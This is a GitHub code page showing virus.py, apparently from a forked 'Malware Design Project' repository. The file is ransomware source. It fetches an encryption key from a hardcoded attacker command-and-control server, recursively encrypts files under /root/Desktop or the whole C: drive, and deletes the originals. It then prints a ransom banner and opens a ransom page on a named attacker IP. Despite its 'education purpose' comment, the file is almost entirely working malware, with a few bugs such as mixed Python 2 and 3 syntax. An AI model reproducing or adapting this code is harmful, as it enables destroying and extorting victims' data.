forked from sarthak1598/The-Malware-Design-Project
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathvirus.py
148 lines (106 loc) · 5.31 KB
/
virus.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
# This the malware code that is actually to be run on the victims coputer
# conver it to the exe before finally executing on the windows based operating system
# Malware is only for education purpose and learning/understanding the teqnical picture of the virus development .../
#! usr/bin/python
import sys
import os
import time
##os.system("pip install socket && pip install cryptography") # installing the required python libraries ....
import socket
os.system("pip install cryptography") # installing module in case it is not installed with the python package ...
from cryptography.fernet import Fernet
os.system("pip install wget")
import wget
# Iniatilising the socket server
master_serverIP = "10.0.2.15" # The Attacker_server ip address to be hardcoded before finally propagating the malware...//
sock = socket.socket(socket.AF_INET , socket.SOCK_STREAM) # tcp based command and control server controlled by the Attacker/Hacker
sock.connect(("master_serverIP" , int(sys.argv[1]))) # port is also needed to be hardcoded in the code ..
enter = "Running the malware..."
exit = "Data encrytion Started"
print(sock.recv(2048).decode())
key = sock.recv(2048)
print(key)
sock.send(exit.encode())
sock.close()
# this funcrion is platform dependent as it is a data encryption AES function ...no interfereence with the operating system ...
def encrypt_all(key , name):
#if (name!="Ransomware.py"):
with open(name,'rb') as f:
data = f.read()
fernet = Fernet(key)
encrypted = fernet.encrypt(data)
# file extension modification after the file encryption completes in the victim's machine
encrypted_file = name + ".encrypted"
try:
with open(encrypted_file, 'wb') as f:
f.write(encrypted)
# original file removed by the operating system
os.remove(name)
except:
print("Operation not completed , due to some failure ")
# os file system traversal for the linux/unix based os
def filelist_linux():
# declared mylist[] array to find and store all the desired extension files
# that are to be encrypted by the malware
# files containing array --->> List crypcrrp
#mylist = [".txt",".pdf","png","jpg","docx","doc","xls","ppt","pptx","rar","zip",".mp3",".wmv",".mp4"]
#mylist = [".html"]
for root, dirs, files in os.walk("/root/Desktop"):
for file in files:
# searching files of extensions given in the list above
# for ext in mylist:
# if file.endswith(ext):
ally = os.path.join(root, file)
print(ally)
# calling the function ..//>>
encrypt_all(key, ally)
# os file system --->> directory recusive traversal for windows based os ..
def filelist_windows():
for root, dirs, files in os.walk("c:/"):
for file in files:
ally = os.path.join(root,file)
print(ally)
# calling main malware fucntion
encrypt_all(key, ally)
# function for checking the operating system first for the victim before executing the malware accordingly ..
def OS_platform():
# importing the platform function from system library ...
from sys import platform
if platform == "linux" or platform == "linux2":
# linux os is running
# run function for linux file system --->> code !
filelist_linux() # malware in action !!!
final_action() # alert banner display
# REDIRECTING USER TO THE WEB BASED ALERT PAGE TO COLLECT RANSOM
# AND FOR DATA REVERT BACK PROCEDURE COMPLETION ....
import webbrowser
new=2;
url ="http://192.168.43.230/ransom.html"; # HACKER'S SERVER IP.
webbrowser.open(url, new=new);
elif platform == "darwin":
# some other x os is running
pass # till now for a reason for other os X
elif platform == "win32":
# windows os is running here ...
# here , run code for windows specific os file system ...
filelist_windows() # malware in action ..
final_action() # alert banner display
import webbrowser
new=2;
url ="http://192.168.43.230/ransom.html";
webbrowser.open(url, new=new);
# filelist_linux() # Executing the ransomware ...//::))
def ransom_banner():
print "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX!!!!!!1!!!WARNING!!!!!!!!!!!!XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX "
print " "
print "YOU ARE INFECTED WITH THE RAMSOMWARE VIRUS!!!! "
print " "
print "XXXXXXXXXXX!!All of your Important Data Have been encrypted!!!XXXXXXXXXXXX"
print " "
print "Pay the ransom to the given link to recover your encrypted data.../"
def final_action():
ransom_banner()
# pay_ransom() # disabled this function temprarily for the sake ..
# ransom payment function gateway tobe developed ;
# define the function for collecting ransom and generatinf and verifying the user's password
# the end for now--->//